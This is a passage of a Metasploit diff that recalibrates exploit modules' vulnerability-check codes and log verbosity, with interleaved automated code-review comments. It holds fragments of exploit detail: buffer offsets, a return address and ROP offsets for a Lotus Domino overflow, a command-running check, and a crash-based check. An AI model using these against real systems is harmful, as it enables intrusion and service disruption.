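Review bot: In the first miniweb_upload_wbem hunk, `if !res or res.headers['Server'].empty?` raises NoMethodError when the response carries no Server header, because `headers['Server']` is then nil; the new rescue only covers connection errors, so a headerless response still crashes check instead of returning a code. Use `if !res || res.headers['Server'].to_s.empty?`. The new `vprint_error("Connection failed")` also drops the `#{peer} - ` prefix the replaced `fail_with` message and the other messages in this module use; keep it for consistent output.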
--- a/modules/exploits/windows/http/netdecision_http_bof.rb
+++ b/modules/exploits/windows/http/netdecision_http_bof.rb
@@ -63,7 +63,7 @@ class Metasploit3 < Msf::Exploit::Remote
 res = send_request_cgi({'uri'=>'/'})
 banner = res.headers['Server']
 if banner =~ /NetDecision\-HTTP\-Server\/1\.0/
- return Exploit::CheckCode::Vulnerable
+ return Exploit::CheckCode::Appears
 else
 return Exploit::CheckCode::Safe
 end
diff --git a/modules/exploits/windows/http/novell_mdm_lfi.rb b/modules/exploits/windows/http/novell_mdm_lfi.rb
index 584055c214..545ff7152a 100644
--- a/modules/exploits/windows/http/novell_mdm_lfi.rb
+++ b/modules/exploits/windows/http/novell_mdm_lfi.rb
@@ -74,7 +74,7 @@ class Metasploit3 < Msf::Exploit::Remote
 return Exploit::CheckCode::Unknown
 elsif v =~ /^2\.6\.[01]/ or v =~ /^2\.7\.0/
 # Conditions based on OSVDB info
- return Exploit::CheckCode::Vulnerable
+ return Exploit::CheckCode::Appears
 end
 return Exploit::CheckCode::Safe
diff --git a/modules/exploits/windows/http/oracle9i_xdb_pass.rb b/modules/exploits/windows/http/oracle9i_xdb_pass.rb
index 63e31b8db2..cecf607a69 100644
--- a/modules/exploits/windows/http/oracle9i_xdb_pass.rb
+++ b/modules/exploits/windows/http/oracle9i_xdb_pass.rb
@@ -61,8 +61,8 @@ class Metasploit3 < Msf::Exploit::Remote
 resp = sock.get_once
 disconnect
- if (resp =~ /9.2.0.1.0/)
- return Exploit::CheckCode::Vulnerable
+ if (resp =~ /9\.2\.0\.1\.0/)
+ return Exploit::CheckCode::Appears
 end
 return Exploit::CheckCode::Safe
 end
diff --git a/modules/exploits/windows/http/oracle_endeca_exec.rb b/modules/exploits/windows/http/oracle_endeca_exec.rb
index 45ce9d8c4c..90e3dceda1 100644
--- a/modules/exploits/windows/http/oracle_endeca_exec.rb
+++ b/modules/exploits/windows/http/oracle_endeca_exec.rb
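Review bot: In netdecision_http_bof, `res = send_request_cgi({'uri'=>'/'})` is followed directly by `res.headers['Server']` with no nil guard, so an unreachable or silent host makes check raise NoMethodError instead of returning a code; the apache_chunked and hp_nnm_ovas hunks in this commit return Unknown for the nil response. Add `return Exploit::CheckCode::Unknown unless res` between the request and the `banner =` line. The `def check` line is above the hunk.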
@@ -95,15 +95,15 @@ class Metasploit3 < Msf::Exploit::Remote
 version_match = res.body.match(/<serverVersion>Oracle Endeca Server ([0-9\.]*) /)
 if version_match.nil?
- return Exploit::CheckCode::Unknown
+ return Exploit::CheckCode::Safe
 else
 version = version_match[1]
 end
- print_status("#{peer} - Version found: Oracle Endeca Server #{version}")
+ vprint_status("#{peer} - Version found: Oracle Endeca Server #{version}")
 if version =~ /7\.4\.0/ and version <= "7.4.0.787"
- return Exploit::CheckCode::Vulnerable
+ return Exploit::CheckCode::Appears
 end
 return Exploit::CheckCode::Safe
diff --git a/modules/exploits/windows/http/psoproxy91_overflow.rb b/modules/exploits/windows/http/psoproxy91_overflow.rb
index 9d7fd62509..6d8be475ca 100644
--- a/modules/exploits/windows/http/psoproxy91_overflow.rb
+++ b/modules/exploits/windows/http/psoproxy91_overflow.rb
@@ -61,7 +61,7 @@ class Metasploit3 < Msf::Exploit::Remote
 sock.put("GET / HTTP/1.0\r\n\r\n")
 banner = sock.get(-1,3)
 if (banner =~ /PSO Proxy 0\.9/)
- return Exploit::CheckCode::Vulnerable
+ return Exploit::CheckCode::Appears
 end
 return Exploit::CheckCode::Safe
 end
diff --git a/modules/exploits/windows/http/sap_configservlet_exec_noauth.rb b/modules/exploits/windows/http/sap_configservlet_exec_noauth.rb
index 52cf6c8a60..21ff043ae7 100644
--- a/modules/exploits/windows/http/sap_configservlet_exec_noauth.rb
+++ b/modules/exploits/windows/http/sap_configservlet_exec_noauth.rb
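Review bot: `version <= "7.4.0.787"` in oracle_endeca_exec is a string comparison, so dotted versions are ordered lexically: a constructed `7.4.0.1000` sorts below `7.4.0.787` and would be reported Appears. Compare as versions instead, `Gem::Version.new(version) <= Gem::Version.new("7.4.0.787")`; the captured group is restricted to `[0-9\.]*`, so it parses. Switching the missing-`<serverVersion>` path from Unknown to Safe also means a host that answers without that element is reported Safe; if that is intended, a comment on the new `return Exploit::CheckCode::Safe` line stating that the element is always present on Endeca Server would justify it. The `res` request is above the hunk.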
@@ -64,14 +64,16 @@ class Metasploit3 < Msf::Exploit
 begin
 res = send_evil_request(uri, "whoami", 20)
 rescue
- Exploit::CheckCode::Unknown
+ vprint_error("An error has occured while sending the malicious request")
+ return Exploit::CheckCode::Unknown
 end
 if !res
- Exploit::CheckCode::Unknown
+ vprint_error("Connection timed out")
+ return Exploit::CheckCode::Unknown
 elsif res.body.include?("Process created")
- Exploit::CheckCode::Vulnerable
+ return Exploit::CheckCode::Vulnerable
 else
- Exploit::CheckCode::Safe
+ return Exploit::CheckCode::Safe
 end
 end
diff --git a/modules/exploits/windows/http/sap_host_control_cmd_exec.rb b/modules/exploits/windows/http/sap_host_control_cmd_exec.rb
index 13cab152d0..47e0cd709d 100644
--- a/modules/exploits/windows/http/sap_host_control_cmd_exec.rb
+++ b/modules/exploits/windows/http/sap_host_control_cmd_exec.rb
@@ -394,7 +394,7 @@ class Metasploit3 < Msf::Exploit::Remote
 }, 10)
 if (res and res.code == 500 and res.body =~ /Generic error/)
- return CheckCode::Appears
+ return CheckCode::Vulnerable
 else
 return CheckCode::Safe
 end
diff --git a/modules/exploits/windows/http/savant_31_overflow.rb b/modules/exploits/windows/http/savant_31_overflow.rb
index 37efed7261..d439eacd1e 100644
--- a/modules/exploits/windows/http/savant_31_overflow.rb
+++ b/modules/exploits/windows/http/savant_31_overflow.rb
@@ -67,7 +67,7 @@ class Metasploit3 < Msf::Exploit::Remote
 def check
 info = http_fingerprint # check method
 if info and (info =~ /Savant\/3\.1/)
- return Exploit::CheckCode::Vulnerable
+ return Exploit::CheckCode::Appears
 end
 Exploit::CheckCode::Safe
 end
diff --git a/modules/exploits/windows/http/servu_session_cookie.rb b/modules/exploits/windows/http/servu_session_cookie.rb
index 3093d9cb03..07f2fd2180 100644
--- a/modules/exploits/windows/http/servu_session_cookie.rb
+++ b/modules/exploits/windows/http/servu_session_cookie.rb
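Review bot: The new message `vprint_error("An error has occured while sending the malicious request")` misspells "occurred". The bare `rescue` it sits in still catches every StandardError, so a programming error inside `send_evil_request` is reported as Unknown with no diagnostic; rescuing the connection classes this codebase uses elsewhere on this page, `rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Timeout::Error => e` and including `e.message` in the log line, would keep the cause visible. Returning Vulnerable on `Process created` is justified because the request actually runs a command, but that also makes this an active check; a one-line comment above `begin` saying so would help anyone triaging its output.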
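Review bot: Raising `CheckCode::Appears` to `CheckCode::Vulnerable` in sap_host_control_cmd_exec on `res.code == 500 and res.body =~ /Generic error/` rests on a generic error page, which is weaker evidence than the confirmed command output the sap_configservlet hunk in this same commit requires for Vulnerable. Unless the request above the hunk (outside view) triggers the flaw in a way that a 500 alone proves, Appears is the honest code; if the 500 really is the oracle, a comment on that line explaining why would stop the next reviewer from downgrading it again.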
@@ -79,7 +79,7 @@ class Metasploit3 < Msf::Exploit::Remote
 disconnect
 if (res =~ /Server: Serv-U\/9\.0\.0\.5/)
- return Exploit::CheckCode::Vulnerable
+ return Exploit::CheckCode::Appears
 elsif (res =~ /Server: Serv-U/)
 return Exploit::CheckCode::Detected
 end
diff --git a/modules/exploits/windows/http/shoutcast_format.rb b/modules/exploits/windows/http/shoutcast_format.rb
index 02145d4867..70e3f35024 100644
--- a/modules/exploits/windows/http/shoutcast_format.rb
+++ b/modules/exploits/windows/http/shoutcast_format.rb
@@ -65,14 +65,15 @@ class Metasploit3 < Msf::Exploit::Remote
 m = r.body.match(/Network Audio Server\/([^\s]+)\s+([^<]+)<BR/)
 return Exploit::CheckCode::Safe if not m
- print_status("This system is running SHOUTcast #{m[1]} on #{m[2]}")
+ vprint_status("This system is running SHOUTcast #{m[1]} on #{m[2]}")
 # SHOUTcast Distributed Network Audio Server/win32 v1.9.2<BR>
 if (m[1] =~ /v1\.([0-8]\.|9\.[0-3])$/)
 if (m[2] == "win32")
- return Exploit::CheckCode::Vulnerable
+ return Exploit::CheckCode::Appears
+ else
+ return Exploit::CheckCode::Detected
 end
- print_status("Vulnerable version detected, but not a win32 host")
 end
 return Exploit::CheckCode::Safe
diff --git a/modules/exploits/windows/http/sonicwall_scrutinizer_sqli.rb b/modules/exploits/windows/http/sonicwall_scrutinizer_sqli.rb
index 9fe203fdf3..2a37f164f4 100644
--- a/modules/exploits/windows/http/sonicwall_scrutinizer_sqli.rb
+++ b/modules/exploits/windows/http/sonicwall_scrutinizer_sqli.rb
@@ -63,7 +63,7 @@ class Metasploit3 < Msf::Exploit::Remote
 res = send_request_raw({'uri'=>'/'})
 # Check the base path for version regex
 if res and res.body =~ /\<title\>Scrutinizer\<\/title\>/ and res.body =~ /\<div id\=\'.+\'\>Scrutinizer 9\.[0-5]\.[0-1]\<\/div\>/
- return Exploit::CheckCode::Vulnerable
+ return Exploit::CheckCode::Appears
 end
 return Exploit::CheckCode::Safe
diff --git a/modules/exploits/windows/http/steamcast_useragent.rb b/modules/exploits/windows/http/steamcast_useragent.rb
index 6504820ad3..6debd28036 100644
--- a/modules/exploits/windows/http/steamcast_useragent.rb
+++ b/modules/exploits/windows/http/steamcast_useragent.rb
@@ -63,8 +63,8 @@ class Metasploit3 < Msf::Exploit::Remote
 res = sock.get(-1, 3)
 disconnect
- if (res =~ /Steamcast\/0.9.75/)
- return Exploit::CheckCode::Vulnerable
+ if (res =~ /Steamcast\/0\.9\.75/)
+ return Exploit::CheckCode::Appears
 end
 return Exploit::CheckCode::Safe
 end
diff --git a/modules/exploits/windows/http/sws_connection_bof.rb b/modules/exploits/windows/http/sws_connection_bof.rb
index 7e7773d954..a26a19d90c 100644
--- a/modules/exploits/windows/http/sws_connection_bof.rb
+++ b/modules/exploits/windows/http/sws_connection_bof.rb
@@ -64,7 +64,7 @@ class Metasploit3 < Msf::Exploit::Remote
 def check
 res = send_request_raw({'uri'=>'/'})
 if res and res.headers['Server'] =~ /PMSoftware\-SWS\/2\.[0-2]/
- return Exploit::CheckCode::Vulnerable
+ return Exploit::CheckCode::Appears
 end
 return Exploit::CheckCode::Safe
diff --git a/modules/exploits/windows/http/trackercam_phparg_overflow.rb b/modules/exploits/windows/http/trackercam_phparg_overflow.rb
index bb598c488d..fc74de354b 100644
--- a/modules/exploits/windows/http/trackercam_phparg_overflow.rb
+++ b/modules/exploits/windows/http/trackercam_phparg_overflow.rb
@@ -73,8 +73,8 @@ class Metasploit3 < Msf::Exploit::Remote
 if (res and res.body =~ /fsockopen/)
 fp = fingerprint()
- print_status("Detected a vulnerable TrackerCam installation on #{fp}")
- return Exploit::CheckCode::Confirmed
+ vprint_status("Detected a vulnerable TrackerCam installation on #{fp}")
+ return Exploit::CheckCode::Detected
 end
 return Exploit::CheckCode::Safe
 end
diff --git a/modules/exploits/windows/http/xitami_if_mod_since.rb b/modules/exploits/windows/http/xitami_if_mod_since.rb
index 0af979dddc..f10b39da33 100644
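Review bot: In trackercam_phparg_overflow the message `vprint_status("Detected a vulnerable TrackerCam installation on #{fp}")` still says "vulnerable" while the return value is now `Exploit::CheckCode::Detected`, which on the scale this commit applies elsewhere means the product was seen but not confirmed vulnerable; reword it to `vprint_status("Detected a TrackerCam installation on #{fp}")` so the log and the code agree. `fingerprint()` can also drop its empty parens. The request that fills `res` is above the hunk.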
--- a/modules/exploits/windows/http/xitami_if_mod_since.rb
+++ b/modules/exploits/windows/http/xitami_if_mod_since.rb
@@ -65,9 +65,11 @@ class Metasploit3 < Msf::Exploit::Remote
 disconnect
 if (banner =~ /Xitami/)
- return Exploit::CheckCode::Appears
+ vprint_status("Banner: #{banner}")
+ return Exploit::CheckCode::Detected
 end
- return Exploit::CheckCode::Safe
+
+ return Exploit::CheckCode::Safe
 end
 def exploit
diff --git a/modules/exploits/windows/iis/ms03_007_ntdll_webdav.rb b/modules/exploits/windows/iis/ms03_007_ntdll_webdav.rb
index b2c1f59491..cab8756d24 100644
--- a/modules/exploits/windows/iis/ms03_007_ntdll_webdav.rb
+++ b/modules/exploits/windows/iis/ms03_007_ntdll_webdav.rb
@@ -85,6 +85,7 @@ class Metasploit3 < Msf::Exploit::Remote
 if (response and response.body =~ /Server Error\(exception/)
+ vprint_status("We've hit a server error (exception)")
 return Exploit::CheckCode::Vulnerable
 end
@@ -92,6 +93,7 @@ class Metasploit3 < Msf::Exploit::Remote
 begin
 send_request_raw({'uri' => '/'}, 5)
 rescue
+ vprint_status("The server stopped accepting requests")
 return Exploit::CheckCode::Vulnerable
 end
diff --git a/modules/exploits/windows/imap/eudora_list.rb b/modules/exploits/windows/imap/eudora_list.rb
index 6a2017102d..c8977cd552 100644
--- a/modules/exploits/windows/imap/eudora_list.rb
+++ b/modules/exploits/windows/imap/eudora_list.rb
@@ -60,7 +60,7 @@ class Metasploit3 < Msf::Exploit::Remote
 targ = auto_target
 disconnect
- return Exploit::CheckCode::Vulnerable if (targ)
+ return Exploit::CheckCode::Appears if (targ)
 return Exploit::CheckCode::Safe
 end
diff --git a/modules/exploits/windows/imap/mailenable_w3c_select.rb b/modules/exploits/windows/imap/mailenable_w3c_select.rb
index 8875e6465c..e14ae84a4a 100644
--- a/modules/exploits/windows/imap/mailenable_w3c_select.rb
+++ b/modules/exploits/windows/imap/mailenable_w3c_select.rb
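Review bot: The second ms03_007_ntdll_webdav hunk's bare `rescue` returns Vulnerable on any exception raised by `send_request_raw`, including a timeout or connection failure unrelated to the preceding request, so a host that merely becomes unreachable mid-check is reported Vulnerable; rescuing the specific connection classes used elsewhere on this page (`::Rex::ConnectionRefused`, `::Rex::HostUnreachable`, `::Rex::ConnectionTimeout`, `::Timeout::Error`) and logging the exception message would tighten that signal. The new `vprint_status("The server stopped accepting requests")` also makes explicit that the verdict is read from the service no longer answering, which means this check is disruptive rather than passive; that deserves a comment at the top of check (above the first hunk) so it is not run as a harmless probe. Both hunks sit inside a method whose start and end are outside the view.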
@@ -55,7 +55,7 @@ class Metasploit3 < Msf::Exploit::Remote disconnect if (banner and banner =~ /MailEnable Service, Version: 0-1\.54/) - return Exploit::CheckCode::Vulnerable + return Exploit::CheckCode::Appears end return Exploit::CheckCode::Safe end diff --git a/modules/exploits/windows/imap/mdaemon_fetch.rb b/modules/exploits/windows/imap/mdaemon_fetch.rb index a26f49163a..4362957696 100644 --- a/modules/exploits/windows/imap/mdaemon_fetch.rb +++ b/modules/exploits/windows/imap/mdaemon_fetch.rb @@ -51,8 +51,8 @@ class Metasploit3 < Msf::Exploit::Remote connect disconnect - if (banner and banner =~ /IMAP4rev1 MDaemon 9.6.4 ready/) - return Exploit::CheckCode::Vulnerable + if (banner and banner =~ /IMAP4rev1 MDaemon 9\.6\.4 ready/) + return Exploit::CheckCode::Appears end return Exploit::CheckCode::Safe end diff --git a/modules/exploits/windows/imap/mercury_login.rb b/modules/exploits/windows/imap/mercury_login.rb index c3618c9423..e4d813882a 100644 --- a/modules/exploits/windows/imap/mercury_login.rb +++ b/modules/exploits/windows/imap/mercury_login.rb @@ -58,7 +58,7 @@ class Metasploit3 < Msf::Exploit::Remote disconnect if (resp =~ /Mercury\/32 v4\.01[a-b]/) - return Exploit::CheckCode::Vulnerable + return Exploit::CheckCode::Appears end return Exploit::CheckCode::Safe end diff --git a/modules/exploits/windows/imap/mercury_rename.rb b/modules/exploits/windows/imap/mercury_rename.rb index f21948919e..6080430d34 100644 --- a/modules/exploits/windows/imap/mercury_rename.rb +++ b/modules/exploits/windows/imap/mercury_rename.rb @@ -53,7 +53,7 @@ class Metasploit3 < Msf::Exploit::Remote disconnect if (resp =~ /Mercury\/32 v4\.01a/) - return Exploit::CheckCode::Vulnerable + return Exploit::CheckCode::Appears end return Exploit::CheckCode::Safe end diff --git a/modules/exploits/windows/isapi/ms00_094_pbserver.rb b/modules/exploits/windows/isapi/ms00_094_pbserver.rb index 8d590ca422..aa87ef8f5d 100644 --- a/modules/exploits/windows/isapi/ms00_094_pbserver.rb 
+++ b/modules/exploits/windows/isapi/ms00_094_pbserver.rb @@ -62,7 +62,7 @@ class Metasploit3 < Msf::Exploit::Remote }, 5) if (res and res.code == 400) - return Exploit::CheckCode::Vulnerable + return Exploit::CheckCode::Detected end return Exploit::CheckCode::Safe end diff --git a/modules/exploits/windows/isapi/rsa_webagent_redirect.rb b/modules/exploits/windows/isapi/rsa_webagent_redirect.rb index e7d86c8891..4b8d9e8e86 100644 --- a/modules/exploits/windows/isapi/rsa_webagent_redirect.rb +++ b/modules/exploits/windows/isapi/rsa_webagent_redirect.rb @@ -74,7 +74,7 @@ class Metasploit3 < Msf::Exploit::Remote }, -1) if (r and r.body and r.body =~ /RSA Web Access Authentication/) - return Exploit::CheckCode::Detected + return Exploit::CheckCode::Appears end return Exploit::CheckCode::Safe end diff --git a/modules/exploits/windows/isapi/w3who_query.rb b/modules/exploits/windows/isapi/w3who_query.rb index 56b7870962..cf05fe3447 100644 --- a/modules/exploits/windows/isapi/w3who_query.rb +++ b/modules/exploits/windows/isapi/w3who_query.rb @@ -84,7 +84,7 @@ class Metasploit3 < Msf::Exploit::Remote def check if auto_target - return Exploit::CheckCode::Vulnerable + return Exploit::CheckCode::Appears end Exploit::CheckCode::Safe end diff --git a/modules/exploits/windows/license/calicserv_getconfig.rb b/modules/exploits/windows/license/calicserv_getconfig.rb index 9cc700febf..4d23542e5d 100644 --- a/modules/exploits/windows/license/calicserv_getconfig.rb +++ b/modules/exploits/windows/license/calicserv_getconfig.rb @@ -73,7 +73,7 @@ class Metasploit3 < Msf::Exploit::Remote res = sock.get_once || '' disconnect if (res =~ /OS\<([^\>]+)/) - print_status("CA License Server reports OS: #{$1}") + vprint_status("CA License Server reports OS: #{$1}") return Exploit::CheckCode::Detected end return Exploit::CheckCode::Safe 
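Review bot: The calicserv_getconfig hunk keeps `#{$1}` in the new vprint_status call, which depends on the implicit last-match global; a named read is clearer and survives later edits that insert another match between the regex and the use, e.g. `vprint_status("CA License Server reports OS: #{Regexp.last_match(1)}")`. The rsa_webagent_redirect hunk on this line raises the result to Appears on a body string match alone, which is a version-agnostic banner; that looks closer to Detected by the scale the other hunks apply, but I cannot see the rest of that check to be sure.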
diff --git a/modules/exploits/windows/local/always_install_elevated.rb b/modules/exploits/windows/local/always_install_elevated.rb index ae85df5729..bc4f0516a2 100644 --- a/modules/exploits/windows/local/always_install_elevated.rb +++ b/modules/exploits/windows/local/always_install_elevated.rb @@ -70,24 +70,24 @@ class Metasploit3 < Msf::Exploit::Local local_machine_value = registry_getvaldata(hklm,install_elevated) if local_machine_value.nil? - print_error("#{hklm}\\#{install_elevated} does not exist or is not accessible.") + vprint_error("#{hklm}\\#{install_elevated} does not exist or is not accessible.") return Msf::Exploit::CheckCode::Safe elsif local_machine_value == 0 - print_error("#{hklm}\\#{install_elevated} is #{local_machine_value}.") + vprint_error("#{hklm}\\#{install_elevated} is #{local_machine_value}.") return Msf::Exploit::CheckCode::Safe else - print_good("#{hklm}\\#{install_elevated} is #{local_machine_value}.") + vprint_good("#{hklm}\\#{install_elevated} is #{local_machine_value}.") current_user_value = registry_getvaldata(hkcu,install_elevated) end if current_user_value.nil? - print_error("#{hkcu}\\#{install_elevated} does not exist or is not accessible.") + vprint_error("#{hkcu}\\#{install_elevated} does not exist or is not accessible.") return Msf::Exploit::CheckCode::Safe elsif current_user_value == 0 - print_error("#{hkcu}\\#{install_elevated} is #{current_user_value}.") + vprint_error("#{hkcu}\\#{install_elevated} is #{current_user_value}.") return Msf::Exploit::CheckCode::Safe else - print_good("#{hkcu}\\#{install_elevated} is #{current_user_value}.") + vprint_good("#{hkcu}\\#{install_elevated} is #{current_user_value}.") return Msf::Exploit::CheckCode::Vulnerable end end diff --git a/modules/exploits/windows/local/ikeext_service.rb b/modules/exploits/windows/local/ikeext_service.rb index 79ef29f143..4a508caf51 100644 --- a/modules/exploits/windows/local/ikeext_service.rb +++ b/modules/exploits/windows/local/ikeext_service.rb 
@@ -88,20 +88,20 @@ class Metasploit3 < Msf::Exploit::Local case srv_info['Startup'] when 'Disabled' - print_error("Service startup is Disabled, so will be unable to exploit unless account has correct permissions...") + vprint_error("Service startup is Disabled, so will be unable to exploit unless account has correct permissions...") return Exploit::CheckCode::Safe when 'Manual' - print_error("Service startup is Manual, so will be unable to exploit unless account has correct permissions...") + vprint_error("Service startup is Manual, so will be unable to exploit unless account has correct permissions...") return Exploit::CheckCode::Safe when 'Auto' - print_good("Service is set to Automatically start...") + vprint_good("Service is set to Automatically start...") end if check_search_path return Exploit::CheckCode::Safe end - return Exploit::CheckCode::Vulnerable + return Exploit::CheckCode::Appears end def check_search_path diff --git a/modules/exploits/windows/local/nvidia_nvsvc.rb b/modules/exploits/windows/local/nvidia_nvsvc.rb index 33223ce462..5e4c70798b 100644 --- a/modules/exploits/windows/local/nvidia_nvsvc.rb +++ b/modules/exploits/windows/local/nvidia_nvsvc.rb @@ -82,12 +82,13 @@ class Metasploit3 < Msf::Exploit::Local begin if is_running? - print_good("Service is running") + vprint_good("Service is running") else - print_error("Service is not running!") + vprint_error("Service is not running!") end rescue RuntimeError => e - print_error("Unable to retrieve service status") + vprint_error("Unable to retrieve service status") + return Exploit::CheckCode::Unknown end if sysinfo['Architecture'] =~ /WOW64/i diff --git a/modules/exploits/windows/local/trusted_service_path.rb b/modules/exploits/windows/local/trusted_service_path.rb index 85968af822..169574a435 100644 --- a/modules/exploits/windows/local/trusted_service_path.rb +++ b/modules/exploits/windows/local/trusted_service_path.rb 
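Review bot: In the nvidia_nvsvc hunk the new `return Exploit::CheckCode::Unknown` sits in `rescue RuntimeError => e` but `e` is never used, so the verbose output gives no hint why the service status could not be read. Including it costs one change: `vprint_error("Unable to retrieve service status: #{e.message}")`. The check method continues outside the hunk, so I cannot tell whether the `sysinfo['Architecture']` branch that follows also needs an Unknown path.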
@@ -56,6 +56,7 @@ class Metasploit3 < Msf::Exploit::Local if enum_vuln_services.empty? return Exploit::CheckCode::Safe else + # Found service is running system return Exploit::CheckCode::Vulnerable end end diff --git a/modules/exploits/windows/lotus/domino_icalendar_organizer.rb b/modules/exploits/windows/lotus/domino_icalendar_organizer.rb index c84035dd39..b29329933f 100644 --- a/modules/exploits/windows/lotus/domino_icalendar_organizer.rb +++ b/modules/exploits/windows/lotus/domino_icalendar_organizer.rb @@ -26,7 +26,7 @@ class Metasploit3 < Msf::Exploit::Remote 'Author' => [ 'A. Plaskett', #Initial discovery, poc - 'sinn3r', #Metasploit + 'sinn3r' #Metasploit ], 'References' => [ @@ -34,14 +34,14 @@ class Metasploit3 < Msf::Exploit::Remote [ 'OSVDB', '68040' ], [ 'ZDI', '10-177' ], [ 'URL', 'http://labs.mwrinfosecurity.com/advisories/lotus_domino_ical_stack_buffer_overflow/' ], - [ 'URL', 'http://www-01.ibm.com/support/docview.wss?rs=475&uid=swg21446515' ], + [ 'URL', 'http://www-01.ibm.com/support/docview.wss?rs=475&uid=swg21446515' ] ], 'Payload' => { 'BadChars' => [*(0x00..0x08)].pack("C*") + [*(0x10..0x18)].pack("C*") + [*(0x1a..0x1f)].pack("C*") + "\x2c" + [*(0x80..0xff)].pack("C*"), 'EncoderType' => Msf::Encoder::Type::AlphanumMixed, 'EncoderOptions' => {'BufferRegister'=>'ECX'}, - 'StackAdjustment' => -3500, + 'StackAdjustment' => -3500 }, 'DefaultOptions' => { @@ -55,7 +55,7 @@ class Metasploit3 < Msf::Exploit::Remote { 'Offset' => 2374, #Offset to EIP 'Ret' => 0x6030582B, #JMP ECX - 'MaxBuffer' => 9010, #Total buffer size + 'MaxBuffer' => 9010 #Total buffer size } ], [ @@ -63,7 +63,7 @@ class Metasploit3 < Msf::Exploit::Remote { 'Offset' => 2374, #Offset to EIP 'Ret' => 0x6030582B, #JMP ECX (Domino\\nnotes.dll) - 'MaxBuffer' => 9010, #Total buffer size + 'MaxBuffer' => 9010 #Total buffer size } ], [ 
@@ -74,7 +74,7 @@ class Metasploit3 < Msf::Exploit::Remote 'EAX' => 0x7C35287F, #Initial CALL VirtualProtect addr to align (MSVCR71.dll) 'EaxOffset' => 2342, #Offset to EAX 'RopOffset' => 24, #Offset to ROP gadgets - 'MaxBuffer' => 9010, #Total buffer size + 'MaxBuffer' => 9010 #Total buffer size } ], ], @@ -85,7 +85,7 @@ class Metasploit3 < Msf::Exploit::Remote [ Opt::RPORT(25), OptString.new('MAILFROM', [true, 'Valid Lotus Domino mailbox account', '']), - OptString.new('MAILTO', [true, 'Valid Lotus Domino mailbox account', '']), + OptString.new('MAILTO', [true, 'Valid Lotus Domino mailbox account', '']) ], self.class) end @@ -94,8 +94,8 @@ class Metasploit3 < Msf::Exploit::Remote banner = (sock.get_once(-1,5) || '').chomp disconnect - if banner =~ /Lotus Domino Release 8.5/ - return Exploit::CheckCode::Vulnerable + if banner =~ /Lotus Domino Release 8\.5/ + return Exploit::CheckCode::Appears else return Exploit::CheckCode::Safe end diff --git a/modules/exploits/windows/misc/altiris_ds_sqli.rb b/modules/exploits/windows/misc/altiris_ds_sqli.rb index 7394a2cae7..9d9b612caf 100644 --- a/modules/exploits/windows/misc/altiris_ds_sqli.rb +++ b/modules/exploits/windows/misc/altiris_ds_sqli.rb @@ -131,14 +131,14 @@ Processor-Speed=#{processor_speed} return Exploit::CheckCode::Safe end - print_status "#{rhost}:#{rport} - Altiris DS Version '#{version}'" + vprint_status "#{rhost}:#{rport} - Altiris DS Version '#{version}'" minor = $1.to_i build = $2.to_i if minor == 8 if build == 206 || build == 282 || build == 378 - return Exploit::CheckCode::Vulnerable + return Exploit::CheckCode::Appears elsif build < 390 return Exploit::CheckCode::Appears end diff --git a/modules/exploits/windows/misc/bakbone_netvault_heap.rb b/modules/exploits/windows/misc/bakbone_netvault_heap.rb index 4fda35027d..b58b65aea6 100644 --- a/modules/exploits/windows/misc/bakbone_netvault_heap.rb +++ b/modules/exploits/windows/misc/bakbone_netvault_heap.rb 
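Review bot: In the altiris_ds_sqli hunk both branches now return CheckCode::Appears, and since 206, 282 and 378 are all below 390 the first `if build == 206 || build == 282 || build == 378` is fully subsumed by `elsif build < 390`; the pair can collapse to `return Exploit::CheckCode::Appears if build < 390` inside the `minor == 8` block. If the intent was to keep the three known-vulnerable builds on a stronger code than untested ones, that distinction has been lost and deserves a comment. The enclosing check method starts before the hunk.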
@@ -75,7 +75,7 @@ class Metasploit3 < Msf::Exploit::Remote if ver > 0 print_status("Detected NetVault Build #{ver}") - return Exploit::CheckCode::Detected + return Exploit::CheckCode::Appears end end diff --git a/modules/exploits/windows/misc/fb_cnct_group.rb b/modules/exploits/windows/misc/fb_cnct_group.rb index 136c50415f..3c8a3deed1 100644 --- a/modules/exploits/windows/misc/fb_cnct_group.rb +++ b/modules/exploits/windows/misc/fb_cnct_group.rb @@ -66,7 +66,8 @@ class Metasploit3 < Msf::Exploit::Remote begin connect rescue - return Exploit::CheckCode::Safe + vprint_error("Unable to get a connection") + return Exploit::CheckCode::Unknown end filename = "C:\\#{rand_text_alpha(12)}.fdb" @@ -99,7 +100,7 @@ class Metasploit3 < Msf::Exploit::Remote return Exploit::CheckCode::Detected end - return Exploit::CheckCode::Unknown + return Exploit::CheckCode::Safe end def stack_pivot_rop_chain diff --git a/modules/exploits/windows/misc/hp_dataprotector_crs.rb b/modules/exploits/windows/misc/hp_dataprotector_crs.rb index 6e5429bf6e..26baf9192d 100644 --- a/modules/exploits/windows/misc/hp_dataprotector_crs.rb +++ b/modules/exploits/windows/misc/hp_dataprotector_crs.rb 
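Review bot: The bakbone_netvault_heap hunk upgrades the result to Appears on a build number alone but leaves `print_status("Detected NetVault Build #{ver}")` at the non-verbose level, unlike every neighbouring hunk in this commit which moves check-time chatter to `vprint_status`. For consistency: `vprint_status("Detected NetVault Build #{ver}")`. In fb_cnct_group the bare `rescue` around `connect` now returns Unknown with a message, which is the right direction; naming the expected exception class (e.g. `rescue ::Rex::ConnectionError`) would keep programming errors from being masked as "unable to connect".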
@@ -139,22 +139,25 @@ class Metasploit3 < Msf::Exploit::Remote fingerprint = get_fingerprint if fingerprint.nil? + vprint_error("Unable to fingerprint") return Exploit::CheckCode::Unknown end port = get_crs_port if port.nil? - print_status("HP Data Protector version #{fingerprint}") - print_error("But CRS port not found") + vprint_status("HP Data Protector version #{fingerprint}") + vprint_error("But CRS port not found") else - print_status("CRS running on port #{port}/TCP, HP Data Protector version #{fingerprint}") + vprint_status("CRS running on port #{port}/TCP, HP Data Protector version #{fingerprint}") end if fingerprint =~ /HP Data Protector A\.06\.20: INET, internal build 370/ - return Exploit::CheckCode::Vulnerable + # More likely to be exploitable + return Exploit::CheckCode::Appears elsif fingerprint =~ /HP Data Protector A\.07\.00: INET, internal build 72/ - return Exploit::CheckCode::Vulnerable + # More likely to be exploitable + return Exploit::CheckCode::Appears elsif fingerprint =~ /HP Data Protector A\.07\.00/ return Exploit::CheckCode::Appears elsif fingerprint =~ /HP Data Protector A\.07\.01/ diff --git a/modules/exploits/windows/misc/hp_omniinet_1.rb b/modules/exploits/windows/misc/hp_omniinet_1.rb index a4e7ce8675..172c557a1b 100644 --- a/modules/exploits/windows/misc/hp_omniinet_1.rb +++ b/modules/exploits/windows/misc/hp_omniinet_1.rb @@ -115,7 